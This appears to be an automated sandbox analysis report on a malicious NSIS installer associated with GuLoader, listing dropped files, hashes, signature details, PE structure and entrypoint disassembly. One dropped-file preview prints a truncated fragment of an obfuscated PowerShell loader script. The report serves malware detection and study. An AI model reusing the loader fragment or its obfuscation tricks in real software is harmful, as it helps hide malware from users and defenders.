Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 2572 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:07:34	API Interceptor	36x Sleep call for process: powershell.exe modified
21:08:51	API Interceptor	20x Sleep call for process: msiexec.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	216.58.206.78 142.250.181.225
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	216.58.206.78 142.250.181.225
	YrCSUX2O3I.exe	Get hash	malicious	GuLoader	Browse	216.58.206.78 142.250.181.225
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	216.58.206.78 142.250.181.225
	4AMVusDMPP.exe	Get hash	malicious	GuLoader	Browse	216.58.206.78 142.250.181.225
	Cpfkf79Rzk.exe	Get hash	malicious	GuLoader	Browse	216.58.206.78 142.250.181.225
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	216.58.206.78 142.250.181.225
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	216.58.206.78 142.250.181.225
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	216.58.206.78 142.250.181.225
	TVPfW4WUdj.exe	Get hash	malicious	GuLoader	Browse	216.58.206.78 142.250.181.225

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_215w40j5.33u.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2i3wxqw4.jxt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bacnwdcu.j1f.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hw4yg1yn.olq.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Detergenternes.bre

Download File

Process:	C:\Users\user\Desktop\ro7eoySJ9q.exe
File Type:	Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
Category:	dropped
Size (bytes):	486421
Entropy (8bit):	1.2470433609131586
Encrypted:	false
SSDEEP:	1536:p9ffEEX6My2RPkr6vyxsgBVdhrF8pGQkuxMSmLgnrL94:bffg2CJbdlFhh2Mwl4
MD5:	858C7D246EC84B37359FDE23A9F8898A
SHA1:	2046EFB2E9421F1F1C0CABA9F0D7ECCAD1F4AE0F
SHA-256:	100C199A129F94FB16BDD51943FB691AB055CEA690088691C0F989D4C1C75884
SHA-512:	547AA46E6279DD8DF920C2BF21B5A98B47F8B2F81E32FB36678119BC9510CA7D358C38C63E46E71285B76236D46D515CFE7C4DEA37660AE63E533AB78878ABBB
Malicious:	false
Preview:	......................................................................;.............................................................Do.......................................9.....................................................................................8...................T......................................................................................................................................k.............................................................{.(................c.............................).....s..................... ..................N.............q............2..............................................................................................c...................C..........................................G......................`.......\|..............7.........0!..................p.........'..............)..........v.z.......................................................................................................[.s............~..A...+..

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis

Download File

Process:	C:\Users\user\Desktop\ro7eoySJ9q.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4311), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	72400
Entropy (8bit):	5.192574154183547
Encrypted:	false
SSDEEP:	1536:AGGe3wKH5jk6dqKN1hsYIOWl8/4noyXgRCopjLSz/1cqtssTzDyohZuK:ALgwKZjNdJN/IXlK4oyXMpja6Ypj/qK
MD5:	FC1243B96424C77D582F495E7572027B
SHA1:	21AF8B3AEAECBD754C5FE4F3B3FE84CF741AC9C4
SHA-256:	2DB217565103029D09CF451F3FACECFF81BEA4D089D1BFE4CCF297B53E2F3CB7
SHA-512:	E35C6DFE1699C9B4011E42A5EFD16F317E718101C7D8A81867B1E2951021BD4DAC0AC59B5AAA9E358E4CB0FA3F0A98C4F279A8B37A0DBFC5F031F9EE1DFEBB91
Malicious:	false
Preview:	$Temporresncubators=$Reheeling218rugerlisten;.....<#Iridectropium Flyswat Bronkoskoperingernes winnowing Stuehus Cleithral Phyllocyst #>..<#Axifugal Dekomprimeret Seismographer Opuscle Antimeson Spanskrrsstok #>..<#Beliggenheders Deceivance Luftgeners Dipodomyinae Diarrbe Krydstogters Fling #>..<#Backyarder Tronbestigning Reauthorises Selskabsproblemet Parforceridt Coughs Galliumoxid #>..<#Delmoments Essenism Olds Cabining Sjakformndenes #>..<#Regrupperingslejre Saddletrees Blokstrukturens aandsnrvrelse #>...$Disfavoured = @'.Hygrosc.Oenocyt$PartereRSchfereeenmarblhImpu.sfe.ilhvise RandrulSessioniBlueblanBarmhjeg Lame r2 calva 1overnot8u,troner .pinode RidmardTankefll J laparSu typer B terneBiophysd,ntibakeTelextjrFornyelsAnisses=Untugge$Holo laS,weethem obligarVinylflg Aabensa Pochera BilggesTidsangeMemoryfrRapunsln AjatsaeHenst.a;Mesocoe.Nystrgef VegetauMaenadinin grebc,egaenbtAntifediParlameocastigan,verthr lithuaTThetemph GangliaGaapaamnDesaminkValenhefAkvaplauHousemalThermoclAnn

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Smkkers.Noe

Download File

Process:	C:\Users\user\Desktop\ro7eoySJ9q.exe
File Type:	data
Category:	dropped
Size (bytes):	315374
Entropy (8bit):	7.718302595085237
Encrypted:	false
SSDEEP:	6144:k1gcaHtn8nWPiQWxAnN/iF14M4337pvwMXMbp2O3oL0z8QOT78wtPaB6:AgcS8nAnWxAtiF14rJMbwO3HrJwhaB6
MD5:	B82937D4161F35374A360149D43614E7
SHA1:	E42EADA7A06078688C363E341ADCE37237B510B3
SHA-256:	DE1F8A1AE7BC242425197B7C5206A558543559A1BF5B5BFA5B4B11EC5CD4FBDF
SHA-512:	90BA42E077A4F569143F935D07A263AF64966D382D4B9ADED1E462B6AE54F195DC07CE6FB67A96AEEF003B4DB13D99DEF1D84B686CC194FC985A56EA0A9999A8
Malicious:	false
Preview:	..7777.................o.......................................5555.........!.f...............rrr..........RRRR......99.................../......LL.........\|............OO...............................................]...........PP.......a.........................RRR..""....................................\|..............>......====.......D.....................s........3.......................).....................FF...llll...s..'''.\\\\.................. .....................5...rrr........_.\....................*... ..............................~~~~.........333.//.........N.....[[[[[[..._..$...~......#.........&...............JJ...............MMMMMM................ ........p........bb.....bbbbb.....................[....t.......f.''....m............ZZ...P..z.............WWW.................................]]]]]]].XXX......n....vvv..........%........... .............................]...........~~..tt...............////.......NNNNN...ggggg..............<<<<.....K.~.........p.....M..

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\brugerinstallation.cry

Download File

Process:	C:\Users\user\Desktop\ro7eoySJ9q.exe
File Type:	Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0, imaginary
Category:	dropped
Size (bytes):	462783
Entropy (8bit):	1.2514895750557933
Encrypted:	false
SSDEEP:	1536:gR0px6Iw5kvIV8FuWk8mGWwi1BoFIN8oYd:jmIwavC6utxgIjYd
MD5:	77218C2134D28A666F2FDEAA5E452489
SHA1:	16E2234D9C2F4E4265D1362887B40149B9E31823
SHA-256:	A901A3525DC18A4A9E6EF655931252D8258D954D419FCE81668F251C8EF54EE5
SHA-512:	AFE9F39C392A6DE29B551393CB032534D04AA18B82E747406A23828DE7B4088FBA3045F0DD8ECC37C3A4FE45125605C0504EA8A1C38DA429624A35753E8E3ED2
Malicious:	false
Preview:	....................]l................pq......................................................................................................p..........................................&...........................................................................].................v.................,.............................................................*.........................+........2.............................GI=..............,............................I............to....{........................8...........f..........XF.........O.............................................................].................-....................+........................2...........................B......................m.....^......................................................................................z....;.........x.....................................................................................................................4.............6...6............s.................

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\cloner.hol

Download File

Process:	C:\Users\user\Desktop\ro7eoySJ9q.exe
File Type:	data
Category:	dropped
Size (bytes):	457562
Entropy (8bit):	1.2482312628496608
Encrypted:	false
SSDEEP:	1536:2jMpNhAlrasgHvP3V5s9ASYucRtPbRS9y:hpNhX93V5sOSTczjB
MD5:	E4AC954ED484155B2A165BF00B1E8A4F
SHA1:	21ACBAC21538E0258892381807BBE19524DA02E3
SHA-256:	3078C30C80C29C473A796C4E1FE5F89A175D9B23FC88DBCD0262D93B0C67BEED
SHA-512:	A63E484A5CF926E2484B69210BE047B1F90DAC2A0F813E33D2F1B507CC45AF21169AEC9EBEAA6152CDB2448BEE7B09D82E4427C7596E864B09A7A15560D323AC
Malicious:	false
Preview:	.......v......... ....:...........r.........................V.......l...Z...^.....................q........................l.........d.c............................................................Y.........................7.....................................o.....................T.................................T...................................n..............................................................g.3......................................................o.....................................X..0.....................................................:..........................Z?..........................s........O........>.................._.................................P.................................................$.................M.....................1........-..............................................I...........(..............................................................m..............-................................................o.....................

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\hickishness.non

Download File

Process:	C:\Users\user\Desktop\ro7eoySJ9q.exe
File Type:	data
Category:	dropped
Size (bytes):	327732
Entropy (8bit):	1.2609335393847756
Encrypted:	false
SSDEEP:	768:rbmwczlydY1vPDT6+VOPnd7avS0bYT7bUkf0+VNt8xT70sob8aN/qfizqd71OFNj:sQdCVXhCo3Vxd/SRgV133ZBLlo
MD5:	622032628F068FE10CC2E51D0502CC9A
SHA1:	5AE897F10B51533C20489B755F4395FCED7EB67C
SHA-256:	840F31C02A7A8CA755C4CD53619D9F93BB42848DD334B25A0A3C72B13F5753F4
SHA-512:	2E5C98D7E3FE856D22381B2B97BAC5DF50C82859CB62DCF1D2FE3386B79D96446887FECB59D43F924200532399307E3846DDECA33FB87A286ADD5E6CEFC10637
Malicious:	false
Preview:	.).............\....................).....................q............A.....c..................................[..,........................(...................................................................}...................................................^................`.................................%.............................................................................L....................~d...............N..........................................h......~.............................~.........B...................Z....0..........................q................................v.......................................k............Y.............................................\|..................................................................1.................T......................................................................................................................k........................................D...-.V..z...'........................................

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\hogni.opd

Download File

Process:	C:\Users\user\Desktop\ro7eoySJ9q.exe
File Type:	data
Category:	dropped
Size (bytes):	433848
Entropy (8bit):	1.255481788885247
Encrypted:	false
SSDEEP:	768:8agBmxdiio94Vue1rGruEhQHTvyGPHzfrm75zidpc8oUH392slzddIRzyP98UmYu:NgKjnn/NnW5hQAPAfMqoDH+bI
MD5:	7586252625434A405256063977B84D0D
SHA1:	BA800F4510A4940F6EA11F866E3F4AF9805BDFD4
SHA-256:	5AFA5BC29281632F196999E16D8F4B26F2C14EC6A8A5F589DC5932B6DE78A2A7
SHA-512:	613E03C6EC8DFBE0B2B6A450B30B932157FE40121E6A7E4AE9FB188193AB6E5D3CA044F30351A3E969FD84BAC8BC7AD2B7DD5E9D0BB091FEDE0546CC9E3A3856
Malicious:	false
Preview:	...............1.............L..................................................................3...............................m...............................................................................................y...........n.................A................G...........$............................m.........................X..............................................................................5.....G.............^....................................\........v.....................-......................................................."............................V........0....................G.........................................................................................................#.....B...............V.....................x............U......................T................................>.................w..............;.....................................L.....................................................................y,.................

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	1060792
Entropy (8bit):	7.56576191182161
Encrypted:	false
SSDEEP:	24576:bj+EJoIVlLHDiemfwmNG3Ap137dboaPjyMi76Kbh:v+xIDXoIt3IRM+i76s
MD5:	69C59075BC9FFD11BF75080CFE44F29E
SHA1:	E1CB7F85EB9236FAD345BC1E3F941219CDF84EDC
SHA-256:	EBDA1DB301F4E3E3500292B8C519298D577CB9908B94F106A3CBE8C83136A423
SHA-512:	163C7AAD4458A5E9BED67D4B20EC2DC06011F249003BC68DB7F38C4E8B617F457D2C9E0C8838D2BF7F63170CDF3C10D430F29110C0BB8C491928808AEC3258B6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.ju.ju.j..ujw.ju.+j..j..wjd.j!..j..j..,jt.jRichu.*j........PE..L....e.Q.................b...........1............@..........................@.......................................................P...............&...............................................................................................text....`.......b.................. ..`.rdata..`............f..............@..@.data................\|..............@....ndata.......P...........................rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\ro7eoySJ9q.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\solvejg.non

Download File

Process:	C:\Users\user\Desktop\ro7eoySJ9q.exe
File Type:	data
Category:	dropped
Size (bytes):	327124
Entropy (8bit):	1.2472891497347776
Encrypted:	false
SSDEEP:	768:qw1bcEnP59OCTltLumdIdNK2mkVYYHN44jjU5S6EP1KRuM/VTCo0oXATL4bYZcOO:jucypY8Gyju3O4/iALDvWJTAnjPqqaO
MD5:	0EC84A842970A2C0B04893F66217F733
SHA1:	E100ACDACE598C27B00E0AF658306942A70228FC
SHA-256:	6B3552FC5295BE3AE9FADD8AFA8A06103BD60DDB6E0BE924C61B346895505A7A
SHA-512:	27270395859FEF2B270B7C2C70FA587BAF4FDCFF742DA93B6F7D1B0B82B5B1FF0BA9004BD3B825A9A62FAE75FB0F792A176ECE980529B61A2FEADE958B8B0BFB
Malicious:	false
Preview:	................:............................q......................[.................c.....................................{.... ..................................K....U............4.........................................@.........................................................\...............e...........................3................J.........L*....................................................................................(.......@..........................................................................g....................4.............................b.......2...............................p.....t.......................4\.................&......d...........................................................................................k......k........................................................................................................................................................................................\....................................0........M

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.56576191182161
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ro7eoySJ9q.exe
File size:	1'060'792 bytes
MD5:	69c59075bc9ffd11bf75080cfe44f29e
SHA1:	e1cb7f85eb9236fad345bc1e3f941219cdf84edc
SHA256:	ebda1db301f4e3e3500292b8c519298d577cb9908b94f106a3cbe8c83136a423
SHA512:	163c7aad4458a5e9bed67d4b20ec2dc06011f249003bc68db7f38c4e8b617f457d2c9e0c8838d2bf7f63170cdf3c10d430f29110c0bb8c491928808aec3258b6
SSDEEP:	24576:bj+EJoIVlLHDiemfwmNG3Ap137dboaPjyMi76Kbh:v+xIDXoIt3IRM+i76s
TLSH:	B8352312B251D48EE4720632E95BE67D043ADF1CDD504A1727A43F9F397BA826C7428F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.ju.ju.j..ujw.ju.+j..j..wjd.j!..j..j..,jt.jRichu.*j........PE..L....e.Q.................b...........1............@

File Icon


Icon Hash:	0d4f7fd151493b07

Static PE Info

General

Entrypoint:	0x4031dd
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x519965E1 [Sun May 19 23:53:05 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7fd61eafe142870d6d0380163804a642

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Cadamba, O=Cadamba, L=Pagney, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	24/06/2024 10:55:01 24/06/2027 10:55:01
Subject Chain	CN=Cadamba, O=Cadamba, L=Pagney, C=FR
Version:	3
Thumbprint MD5:	A1DDD1E0B2FDEE711CFF6DC5EF151203
Thumbprint SHA-1:	E1D495360FBCBEFE3EB73B2B05198778C4E351AA
Thumbprint SHA-256:	7937613CCFB0CF0772387EDE47A346B0A09760A520BEF4DABB06C92C2294CB5B
Serial:	3B493B0032D7E072710BAB5C19E1E82C545F1684

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [00408034h]
push 00008001h
call dword ptr [00408134h]
push ebp
call dword ptr [004082ACh]
push 00000008h
mov dword ptr [00434F58h], eax
call 00007FCE79459DE5h
mov dword ptr [00434EA4h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 0042B1B8h
call dword ptr [0040817Ch]
push 0040A2C0h
push 00433EA0h
call 00007FCE79459A50h
call dword ptr [00408138h]
mov ebx, 0043F000h
push eax
push ebx
call 00007FCE79459A3Eh
push ebp
call dword ptr [0040810Ch]
cmp word ptr [0043F000h], 0022h
mov dword ptr [00434EA0h], eax
mov eax, ebx
jne 00007FCE79456F5Ah
push 00000022h
mov eax, 0043F002h
pop esi
push esi
push eax
call 00007FCE794594ACh
push eax
call dword ptr [00408240h]
mov dword ptr [esp+1Ch], eax
jmp 00007FCE79457019h
push 00000020h
pop edx
cmp cx, dx
jne 00007FCE79456F59h
inc eax
inc eax
cmp word ptr [eax], dx
je 00007FCE79456F4Bh
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x85a0	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x55000	0x2eba8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x1026d0	0x8e8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6010	0x6200	c51ae685760de510818d22f29d66b8b0	False	0.6646603954081632	data	6.440168137798694	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1460	0x1600	24345ed7377f4b4663284282b5ef48b3	False	0.42134232954545453	data	4.947177345443015	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2af98	0x600	dc268be7d1af6fdfcd38d44492cfdaf5	False	0.486328125	data	3.791234740340295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x20000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x55000	0x2eba8	0x2ec00	bdebbd0274fda95ee828978bf6f6217f	False	0.3979413853609626	data	3.9167771947187013	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x55388	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.364929610789069
RT_ICON	0x65bb0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.403011351692243
RT_ICON	0x6f058	0x67e8	Device independent bitmap graphic, 80 x 160 x 32, image size 26560	English	United States	0.4087218045112782
RT_ICON	0x75840	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.4187615526802218
RT_ICON	0x7acc8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.40298771846953235
RT_ICON	0x7eef0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4413900414937759
RT_ICON	0x81498	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.4702157598499062
RT_ICON	0x82540	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.5204918032786885
RT_ICON	0x82ec8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.5824468085106383
RT_DIALOG	0x83330	0x100	data	English	United States	0.5234375
RT_DIALOG	0x83430	0x11c	data	English	United States	0.6091549295774648
RT_DIALOG	0x83550	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x83618	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x83678	0x84	data	English	United States	0.7272727272727273
RT_VERSION	0x83700	0x1d8	data	English	United States	0.5317796610169492
RT_MANIFEST	0x838d8	0x2cb	XML 1.0 document, ASCII text, with very long lines (715), with no line terminators	English	United States	0.5664335664335665

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, SetFileAttributesW, ExpandEnvironmentStringsW, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, SetErrorMode, GetCommandLineW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, MultiByteToWideChar, FindClose, MulDiv, ReadFile, WriteFile, lstrlenA, WideCharToMultiByte
